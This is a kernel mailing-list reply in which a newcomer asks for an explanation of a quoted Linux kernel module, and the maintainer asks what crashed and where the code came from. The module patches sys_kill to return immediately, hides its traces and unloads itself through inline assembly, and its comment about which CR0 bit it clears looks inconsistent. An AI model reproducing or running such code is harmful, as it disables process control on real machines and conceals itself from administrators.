On Sun, Jun 26, 2016 at 09:35:55AM +0000, Manavendra Nath Manav wrote:
> Can someone explain the following kernel module code. I'm not familiar with x86
> assembly so have problem understanding this part. Also it seems this code is
> able to modify the kernel stack.
>
> /******************start****************/
>
> #include <linux/module.h>
>
> MODULE_LICENSE("GPL");
>
> int __init init(void) __attribute__((noreturn))
> {
> unsigned long long cr0 = read_cr0();
> write_cr0(cr0 & ~(1 << 4)); /* Clear Extension Type (ET) bit */
> *(unsigned char *)sys_kill = 0xc3; /* opcode for "ret" */
> write_cr0(cr0);
>
> /* Optional code ahead to hide traces of this module. */
> __this_module.refcnt = 1;
> __this_module.state = MODULE_STATE_LIVE;
>
> asm
> (
> "mov %0, %%rsp\n\t"
> "mov %1, %%rdi\n\t" /* name = __this_module.name */
> "xor %%rsi, %%rsi\n\t" /* flags = 0 */
> "jmp sys_delete_module\n\t" /* call delete_module(name, flags) */
> :: "r"(current->stack + THREAD_SIZE - sizeof(struct pt_regs) - 8), "r"(__
> this_module.name) :
> );
> }
>
> void __exit exit(void)
> {
> return;
> }
>
> /*******************end*****************/
What exactly was the crash? And where did you find this kernel module
source from?
greg k-h
_______________________________________________
Kernelnewbies mailing list
Kernelnewbies@xxxxxxxxxxxxxxxxx
http://lists.kernelnewbies.org/mailman/listinfo/kernelnewbies
